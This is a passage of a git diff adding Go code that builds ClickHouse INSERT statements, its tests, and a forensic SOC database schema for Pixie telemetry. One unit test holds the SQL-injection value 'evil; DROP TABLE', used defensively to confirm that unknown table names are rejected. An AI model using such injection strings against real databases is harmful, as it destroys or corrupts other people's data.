+		return nil, ddlErr
+	}
+	names, parseErr := parseColumnList(stmt)
+	return names, parseErr
+}
+
+// InsertSQL builds the INSERT statement for forensic_db.<table>. The result
+// ends in "... VALUES" so that a driver's batch API can append the rows.
+// Columns appear in the order reported by Columns(table); callers MUST
+// append values in that same order. A table name containing a dot is
+// wrapped in backticks. Any error from Columns is returned unchanged.
+func InsertSQL(table string) (string, error) {
+	columns, err := Columns(table)
+	if err != nil {
+		return "", err
+	}
+	target := "forensic_db."
+	if strings.Contains(table, ".") {
+		target += "`" + table + "`"
+	} else {
+		target += table
+	}
+	stmt := "INSERT INTO " + target + " (" + strings.Join(columns, ", ") + ") VALUES"
+	return stmt, nil
+}
+
+// parseColumnList extracts the column names from a CREATE TABLE statement.
+//
+// It starts after the first "(" in ddl and reads the statement line by line
+// until the ")" that closes the column list. Each line contributes at most
+// one column: its first whitespace-separated token. Blank lines and lines
+// that are empty once the "--" comment is removed are skipped.
+//
+// Comments are stripped BEFORE parentheses are counted. A ")" that only
+// appears in commentary (for example "-- 1) first column") therefore cannot
+// end the column list early, while nested parentheses in real SQL such as
+// LowCardinality(String) or DEFAULT now64(3) are still tracked by depth.
+//
+// Quoting is preserved: a column declared as `condition` is returned with
+// its backticks. String literals are not parsed, so a "--" or an unbalanced
+// parenthesis inside a quoted DEFAULT value is not supported.
+//
+// It returns an error when ddl has no "(", when the column list is never
+// closed, or when no column name was found.
+func parseColumnList(ddl string) ([]string, error) {
+	open := strings.Index(ddl, "(")
+	if open < 0 {
+		return nil, fmt.Errorf("malformed DDL: no opening paren")
+	}
+
+	var cols []string
+	depth := 1 // we are already inside the column list's opening paren
+	closed := false
+	for _, raw := range strings.Split(ddl[open+1:], "\n") {
+		// Drop the comment first so parentheses in commentary are never counted.
+		line := raw
+		if i := strings.Index(line, "--"); i >= 0 {
+			line = line[:i]
+		}
+		// Track nesting; cut the line at the paren that closes the column list.
+		for i, r := range line {
+			switch r {
+			case '(':
+				depth++
+			case ')':
+				depth--
+			}
+			if depth == 0 {
+				line = line[:i]
+				closed = true
+				break
+			}
+		}
+		// First whitespace-separated token = column name.
+		line = strings.TrimSuffix(strings.TrimSpace(line), ",")
+		if fields := strings.Fields(line); len(fields) > 0 {
+			cols = append(cols, fields[0])
+		}
+		if closed {
+			break
+		}
+	}
+	if !closed {
+		return nil, fmt.Errorf("malformed DDL: no closing paren for column list")
+	}
+	if len(cols) == 0 {
+		return nil, fmt.Errorf("malformed DDL: no columns parsed")
+	}
+	return cols, nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go
new file mode 100644
index 00000000000..ee66a17a85d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/insert_test.go
@@ -0,0 +1,109 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package clickhouse
+
+import (
+ "errors"
+ "strings"
+ "testing"
+)
+
+// TestColumns_AdaptiveAttribution pins the exact column list, in order, that
+// Columns reports for adaptive_attribution. The sink appends values
+// positionally, so both the names and their order must match the DDL.
+func TestColumns_AdaptiveAttribution(t *testing.T) {
+	expected := []string{
+		"anomaly_hash", "namespace", "pod", "comm", "pid",
+		"hostname", "t_start", "t_end", "last_seen",
+		"last_rule_id", "n_anomalies",
+	}
+	got, err := Columns("adaptive_attribution")
+	if err != nil {
+		t.Fatalf("Columns: %v", err)
+	}
+	if len(got) != len(expected) {
+		t.Fatalf("Columns(adaptive_attribution) length %d, want %d; got %v", len(got), len(expected), got)
+	}
+	for idx := 0; idx < len(expected); idx++ {
+		if got[idx] == expected[idx] {
+			continue
+		}
+		t.Fatalf("col[%d] = %q, want %q (full=%v)", idx, got[idx], expected[idx], got)
+	}
+}
+
+// TestColumns_PixieTablesIncludeNamespaceAndPod runs one subtest per entry of
+// PixieTables(). Each table must expose the namespace and pod columns (the
+// JOIN keys against adaptive_attribution) and must not carry an
+// anomaly_hash / anomaly_hashes column of its own.
+func TestColumns_PixieTablesIncludeNamespaceAndPod(t *testing.T) {
+	for _, table := range PixieTables() {
+		t.Run(table, func(t *testing.T) {
+			cols, err := Columns(table)
+			if err != nil {
+				t.Fatalf("Columns(%q): %v", table, err)
+			}
+			switch {
+			case !contains(cols, "namespace"):
+				t.Fatalf("%s missing namespace; cols=%v", table, cols)
+			case !contains(cols, "pod"):
+				t.Fatalf("%s missing pod; cols=%v", table, cols)
+			case contains(cols, "anomaly_hash"), contains(cols, "anomaly_hashes"):
+				t.Fatalf("%s must not carry hash inline; cols=%v", table, cols)
+			}
+		})
+	}
+}
+
+// TestInsertSQL_AdaptiveAttribution checks the shape of the INSERT statement
+// for adaptive_attribution: it must open with the fully qualified table name
+// followed by a column list and end in ") VALUES".
+func TestInsertSQL_AdaptiveAttribution(t *testing.T) {
+	stmt, err := InsertSQL("adaptive_attribution")
+	if err != nil {
+		t.Fatalf("InsertSQL: %v", err)
+	}
+	const (
+		wantPrefix = "INSERT INTO forensic_db.adaptive_attribution ("
+		wantSuffix = ") VALUES"
+	)
+	switch {
+	case !strings.HasPrefix(stmt, wantPrefix):
+		t.Fatalf("bad prefix: %q", stmt)
+	case !strings.HasSuffix(stmt, wantSuffix):
+		t.Fatalf("bad suffix: %q", stmt)
+	}
+}
+
+// TestInsertSQL_DottedTablesBacktickQuoted checks that the INSERT statement
+// for a dotted table name wraps that name in backticks.
+func TestInsertSQL_DottedTablesBacktickQuoted(t *testing.T) {
+	dotted := []string{"http2_messages.beta", "kafka_events.beta"}
+	for _, table := range dotted {
+		t.Run(table, func(t *testing.T) {
+			stmt, insertErr := InsertSQL(table)
+			if insertErr != nil {
+				t.Fatalf("InsertSQL(%q): %v", table, insertErr)
+			}
+			wantFragment := "INSERT INTO forensic_db.`" + table + "` ("
+			if strings.Contains(stmt, wantFragment) {
+				return
+			}
+			t.Fatalf("dotted table %q not backtick-quoted: %q", table, stmt)
+		})
+	}
+}
+
+// TestInsertSQL_Unknown pins the defensive contract: an empty name and a name
+// carrying an injection attempt must both yield ErrUnknownTable.
+func TestInsertSQL_Unknown(t *testing.T) {
+	rejected := []string{"", "evil; DROP TABLE"}
+	for i := range rejected {
+		if _, err := InsertSQL(rejected[i]); !errors.Is(err, ErrUnknownTable) {
+			t.Fatalf("InsertSQL(%q) → %v, want ErrUnknownTable", rejected[i], err)
+		}
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go
new file mode 100644
index 00000000000..d0cc78a642e
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/integration_test.go
@@ -0,0 +1,154 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+//go:build integration
+// +build integration
+
+package clickhouse_test
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "net/http"
+ "net/url"
+ "os"
+ "strings"
+ "testing"
+ "time"
+
+ chpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+)
+
+// Live integration tests for the operator's schema-apply path. Driven
+// against a real ClickHouse reachable at INTEGRATION_CH_ENDPOINT.
+// Skipped if the env var is unset, so `go test` (without -tags
+// integration) is unaffected.
+
+// envEndpoint returns the value of INTEGRATION_CH_ENDPOINT. When the variable
+// is unset or empty it skips the calling test instead of returning.
+func envEndpoint(t *testing.T) string {
+	t.Helper()
+	if endpoint := os.Getenv("INTEGRATION_CH_ENDPOINT"); endpoint != "" {
+		return endpoint
+	}
+	t.Skip("INTEGRATION_CH_ENDPOINT not set; skipping live ClickHouse test")
+	return "" // not reached: t.Skip stops the test
+}
+
+// envCreds returns the user and password read from INTEGRATION_CH_USER and
+// INTEGRATION_CH_PASSWORD; either may be empty.
+func envCreds() (string, string) {
+	user := os.Getenv("INTEGRATION_CH_USER")
+	password := os.Getenv("INTEGRATION_CH_PASSWORD")
+	return user, password
+}
+
+// httpExists asks ClickHouse over its HTTP interface whether
+// forensic_db.<table> exists and returns the trimmed response body.
+//
+// The query is "EXISTS forensic_db.<table>", sent as the "query" URL
+// parameter of a GET request; a table name containing a dot is wrapped in
+// backticks. Basic auth is attached only when user is non-empty. Any
+// failure (building the request, transport error, non-2xx status, or an
+// error while reading the body) fails the test via t.Fatalf. At most 4096
+// bytes of the body are read.
+func httpExists(t *testing.T, endpoint, user, pass, table string) string {
+	t.Helper()
+	ident := table
+	if strings.Contains(table, ".") {
+		ident = "`" + table + "`"
+	}
+	q := url.Values{}
+	q.Set("query", fmt.Sprintf("EXISTS forensic_db.%s", ident))
+	req, err := http.NewRequest(http.MethodGet, strings.TrimRight(endpoint, "/")+"/?"+q.Encode(), nil)
+	if err != nil {
+		t.Fatalf("build EXISTS req for %s: %v", table, err)
+	}
+	if user != "" {
+		req.SetBasicAuth(user, pass)
+	}
+	resp, err := (&http.Client{Timeout: 10 * time.Second}).Do(req)
+	if err != nil {
+		t.Fatalf("EXISTS %s: %v", table, err)
+	}
+	defer resp.Body.Close()
+	// A failed read must not be mistaken for a real answer, so surface it.
+	body, err := io.ReadAll(io.LimitReader(resp.Body, 4096))
+	if err != nil {
+		t.Fatalf("EXISTS %s: read response: %v", table, err)
+	}
+	if resp.StatusCode/100 != 2 {
+		t.Fatalf("EXISTS %s: HTTP %d: %s", table, resp.StatusCode, strings.TrimSpace(string(body)))
+	}
+	return strings.TrimSpace(string(body))
+}
+
+// TestApply_Live runs Apply() against a live ClickHouse and then asks the
+// server, table by table, whether every entry of OperatorOwnedTables exists.
+// It is the regression guard for the "tables never appear in clickhouse"
+// class of bug: a green run shows that Apply completed without error and
+// that each operator-owned table is present afterwards. A missing table is
+// reported with t.Errorf so all missing tables are listed in one run.
+func TestApply_Live(t *testing.T) {
+	endpoint := envEndpoint(t)
+	user, pass := envCreds()
+
+	applier, newErr := chpkg.NewApplier(endpoint, user, pass)
+	if newErr != nil {
+		t.Fatalf("NewApplier: %v", newErr)
+	}
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+	if applyErr := applier.Apply(ctx); applyErr != nil {
+		t.Fatalf("Apply: %v", applyErr)
+	}
+
+	// Every operator-owned table must EXIST.
+	for _, table := range chpkg.OperatorOwnedTables {
+		if status := httpExists(t, endpoint, user, pass, table); status != "1" {
+			t.Errorf("table forensic_db.%s: EXISTS=%q, want 1", table, status)
+		}
+	}
+}
+
+// TestApply_Idempotent calls Apply() twice in a row against the live server
+// and requires both calls to succeed, i.e. re-applying the schema must not
+// fail (CREATE TABLE IF NOT EXISTS semantics on every statement).
+func TestApply_Idempotent(t *testing.T) {
+	endpoint := envEndpoint(t)
+	user, pass := envCreds()
+	a, err := chpkg.NewApplier(endpoint, user, pass)
+	if err != nil {
+		t.Fatal(err)
+	}
+	// Each Apply gets its own fresh 60s context. Sharing one budget across
+	// both calls makes the second one occasionally fail with
+	// context.DeadlineExceeded on a slow cluster, which would mask the
+	// idempotency property under test.
+	applyOnce := func() error {
+		ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+		defer cancel()
+		return a.Apply(ctx)
+	}
+	if firstErr := applyOnce(); firstErr != nil {
+		t.Fatalf("Apply #1: %v", firstErr)
+	}
+	if secondErr := applyOnce(); secondErr != nil {
+		t.Fatalf("Apply #2 (should be idempotent): %v", secondErr)
+	}
+}
+
+// TestVerifyPixieSchema_Live runs the post-Apply guard VerifyPixieSchema
+// against the live cluster. Per the guard's contract, the required pixie
+// columns (namespace, pod, hostname, time_) must be present on every pixie
+// observation table.
+//
+// Apply and VerifyPixieSchema each get their own context. Apply keeps the
+// same 60s budget the other live tests give it, so a slow schema apply
+// cannot eat into the time available for the verification step and turn
+// into a misleading context.DeadlineExceeded from VerifyPixieSchema.
+func TestVerifyPixieSchema_Live(t *testing.T) {
+	endpoint := envEndpoint(t)
+	user, pass := envCreds()
+
+	a, err := chpkg.NewApplier(endpoint, user, pass)
+	if err != nil {
+		t.Fatal(err)
+	}
+	// Apply first so the test is order-independent w.r.t. TestApply_Live.
+	applyCtx, cancelApply := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancelApply()
+	if err := a.Apply(applyCtx); err != nil {
+		t.Fatalf("Apply (precondition): %v", err)
+	}
+	verifyCtx, cancelVerify := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancelVerify()
+	if err := a.VerifyPixieSchema(verifyCtx); err != nil {
+		t.Fatalf("VerifyPixieSchema: %v", err)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
new file mode 100644
index 00000000000..494285b3d12
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/clickhouse/schema.sql
@@ -0,0 +1,532 @@
+-- Forensic SOC ClickHouse schema (adaptive-write feature, design rev 2)
+-- ----------------------------------------------------------------------
+-- Pixie type map (PixieTypeToClickHouseType):
+-- TIME64NS → DateTime64(9), except event_time → DateTime64(3)
+-- INT64 → Int64 | FLOAT64 → Float64 | STRING → String
+-- BOOLEAN → UInt8 | UINT128 → String
+-- Pixie's retention plugin adds: hostname String, event_time DateTime64(3)
+-- We add: namespace String, pod String (used by adaptive_attribution JOINs).
+--
+-- Engine convention for pixie observation tables:
+-- ENGINE = MergeTree()
+-- PARTITION BY toYYYYMM(event_time)
+-- ORDER BY (hostname, event_time)
+--
+-- The hash IS NOT stored on pixie observation rows. Attribution is via JOIN
+-- against forensic_db.adaptive_attribution on (hostname, namespace, pod, time_).
+-- See the adaptive_attribution definition at the bottom of this file.
+
+CREATE DATABASE IF NOT EXISTS forensic_db;
+
+-- Kubescape alerts (Vector kubescape_to_alerts sink, unchanged).
+CREATE TABLE IF NOT EXISTS forensic_db.alerts (
+ timestamp DateTime64(3),
+ ingest_time DateTime64(3) DEFAULT now64(3), -- filled with the server clock when the writer omits it
+ rule_id LowCardinality(String),
+ alert_name LowCardinality(String),
+ severity UInt8,
+ unique_id String,
+ cluster_name LowCardinality(String),
+ namespace LowCardinality(String),
+ pod_name String,
+ container_name LowCardinality(String),
+ container_id String,
+ workload_name LowCardinality(String),
+ workload_kind LowCardinality(String),
+ image LowCardinality(String),
+ infected_pid UInt32,
+ process_name LowCardinality(String),
+ process_cmdline String,
+ message String,
+ raw_event String
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(timestamp)
+ ORDER BY (timestamp, severity, namespace, rule_id)
+ TTL toDateTime(timestamp) + INTERVAL 90 DAY DELETE -- rows expire 90 days after timestamp
+ SETTINGS index_granularity = 8192, ttl_only_drop_parts = 1;
+
+-- Kubescape raw logs — Vector kubescape_enrich sink writes here, the operator's
+-- trigger reads it. anomaly_hash column kept here as DEFAULT '' for backwards
+-- compat with any existing Vector pipeline that already populates it; the
+-- operator does not depend on it being non-empty.
+CREATE TABLE IF NOT EXISTS forensic_db.kubescape_logs (
+ BaseRuntimeMetadata String,
+ CloudMetadata String,
+ RuleID String,
+ RuntimeK8sDetails String,
+ RuntimeProcessDetails String,
+ event String,
+ event_time UInt64, -- NOTE(review): the trigger_watermark comment in this file calls this value nanoseconds, confirm the unit
+ hostname String,
+ level String DEFAULT '',
+ message String DEFAULT '',
+ msg String DEFAULT '',
+ processtree_depth String DEFAULT '',
+ anomaly_hash String DEFAULT ''
+) ENGINE = MergeTree()
+ ORDER BY (event_time, hostname)
+ PARTITION BY toYYYYMM(toDateTime(event_time)) -- NOTE(review): toDateTime reads the value as seconds, if event_time is nanoseconds this needs fromUnixTimestamp64Nano as in dx_attack_graph
+ TTL toDateTime(event_time) + INTERVAL 30 DAY DELETE -- NOTE(review): same unit question as the PARTITION BY expression above
+ SETTINGS index_granularity = 8192;
+
+-- ============================================================================
+-- 13 Pixie socket_tracer tables (12 protocol tables plus conn_stats) — strongly predefined, namespace + pod added.
+-- The retention scripts (PxL, user-defined or shipped defaults) MUST populate
+-- namespace + pod via px.upid_to_namespace / px.upid_to_pod_name.
+-- ============================================================================
+
+-- http_events — pixie/src/stirling/source_connectors/socket_tracer/http_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.http_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ major_version Int64,
+ minor_version Int64,
+ content_type Int64,
+ req_headers String,
+ req_method String,
+ req_path String,
+ req_body String,
+ req_body_size Int64,
+ resp_headers String,
+ resp_status Int64,
+ resp_message String,
+ resp_body String,
+ resp_body_size Int64,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- http2_messages.beta — http2_messages_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.`http2_messages.beta` (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ stream_id Int64,
+ headers String,
+ body String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- dns_events — dns_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.dns_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_header String,
+ req_body String,
+ resp_header String,
+ resp_body String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- redis_events — redis_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.redis_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd String,
+ req_args String,
+ resp String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- mysql_events — mysql_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.mysql_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd Int64,
+ req_body String,
+ resp_status Int64,
+ resp_body String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- pgsql_events — pgsql_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.pgsql_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req String,
+ resp String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- cql_events — cass_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.cql_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_op Int64,
+ req_body String,
+ resp_op Int64,
+ resp_body String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- mongodb_events — mongodb_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.mongodb_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd String,
+ req_body String,
+ resp_status String,
+ resp_body String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- kafka_events.beta — kafka_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.`kafka_events.beta` (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_cmd Int64,
+ client_id String,
+ req_body String,
+ resp String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- amqp_events — amqp_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.amqp_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ frame_type Int64,
+ channel Int64,
+ method String,
+ payload String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- mux_events — mux_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.mux_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ trace_role Int64,
+ encrypted UInt8,
+ req_type Int64,
+ req String,
+ resp String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- tls_events — tls_table.h
+CREATE TABLE IF NOT EXISTS forensic_db.tls_events (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ local_addr String,
+ local_port Int64,
+ version Int64,
+ content_type Int64,
+ handshake String,
+ latency Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- conn_stats — conn_stats_table.h
+-- Connection-level statistics (open/close/active counters + bytes_sent/recv +
+-- protocol/ssl). Re-added to the rev-2 schema so the
+-- adaptive_export retention scripts can persist it. local_addr/local_port are
+-- intentionally absent — the pixie kConnStatsElements set carries only
+-- remote_addr/remote_port (the connection is identified by the local upid +
+-- the remote tuple). Rows are kept as written, sorted by (hostname,
+-- event_time); no aggregating engine because each retention-script
+-- pull is a discrete snapshot row.
+CREATE TABLE IF NOT EXISTS forensic_db.conn_stats (
+ time_ DateTime64(9, 'UTC'),
+ upid String,
+ namespace String, -- schema-added JOIN key for attribution lookups
+ pod String, -- schema-added JOIN key for attribution lookups
+ remote_addr String,
+ remote_port Int64,
+ trace_role Int64,
+ addr_family Int64,
+ protocol Int64,
+ ssl UInt8,
+ conn_open Int64,
+ conn_close Int64,
+ conn_active Int64,
+ bytes_sent Int64,
+ bytes_recv Int64,
+ hostname String, -- added by the Pixie retention plugin
+ event_time DateTime64(3, 'UTC') DEFAULT toDateTime64(time_, 3) -- millisecond copy of time_, used for PARTITION BY and ORDER BY
+) ENGINE = MergeTree()
+ PARTITION BY toYYYYMM(event_time)
+ ORDER BY (hostname, event_time);
+
+-- ============================================================================
+-- adaptive_attribution — operator's primary write target in ClickHouse (see also trigger_watermark).
+--
+-- One row per active anomaly hash per node. The operator inserts one row
+-- per arriving kubescape_log on its node. ReplacingMergeTree(t_end) collapses
+-- re-inserts to the row with the largest t_end — so each fresh anomaly with
+-- the same hash extends the active window automatically; stale rows merge
+-- away.
+--
+-- Analyst joins:
+--
+-- SELECT he.*, attr.anomaly_hash
+-- FROM forensic_db.http_events he
+-- ASOF INNER JOIN forensic_db.adaptive_attribution attr
+-- ON he.hostname = attr.hostname
+-- AND he.namespace = attr.namespace
+-- AND he.pod = attr.pod
+-- AND he.time_ >= attr.t_start
+-- WHERE he.time_ <= attr.t_end
+-- AND attr.anomaly_hash = '<anomaly_hash>';
+--
+-- Boot-time rehydration of the operator's in-memory active set:
+--
+-- SELECT * FROM forensic_db.adaptive_attribution FINAL
+-- WHERE hostname = '<hostname>' AND t_end > now64(9);
+--
+-- DateTime64(9, 'UTC') — pin tz so bare-string serialization is
+-- unambiguous; without it, CH parses incoming timestamps in the
+-- server-session timezone and silently shifts values on non-UTC hosts.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.adaptive_attribution (
+ anomaly_hash String,
+ namespace String,
+ pod String,
+ comm String,
+ pid UInt64,
+ hostname String,
+ t_start DateTime64(9, 'UTC'),
+ t_end DateTime64(9, 'UTC'), -- version column, the row with the largest t_end survives a merge
+ last_seen DateTime64(9, 'UTC'),
+ last_rule_id String,
+ n_anomalies UInt64
+) ENGINE = ReplacingMergeTree(t_end)
+ PARTITION BY toYYYYMM(t_start) -- NOTE(review): rows collapse only within one partition, so re-inserts for a hash presumably must keep t_start in the same month, confirm
+ ORDER BY (hostname, anomaly_hash);
+
+-- ============================================================================
+-- trigger_watermark — persistent cursor for the kubescape_logs trigger.
+--
+-- Per node, per source-table. The operator advances the row's `watermark`
+-- (UInt64 event_time, ns) every time it successfully drains a batch of
+-- kubescape rows. On restart it reads the row back and resumes from there
+-- instead of replaying the full table from event_time=0 (which, on a busy
+-- cluster, produces multi-GiB single-shot SELECTs that the HTTP client
+-- times out on, never advancing → infinite stuck loop).
+--
+-- ReplacingMergeTree(updated_at) collapses re-inserts to the newest, so
+-- the operator can INSERT cheaply without bothering with UPDATE
+-- semantics. Reads use FINAL — cheap because cardinality is one row per
+-- (hostname, table_name).
+--
+-- This is the operator's second write target alongside adaptive_attribution.
+-- ============================================================================
+CREATE TABLE IF NOT EXISTS forensic_db.trigger_watermark (
+ hostname String,
+ table_name String,
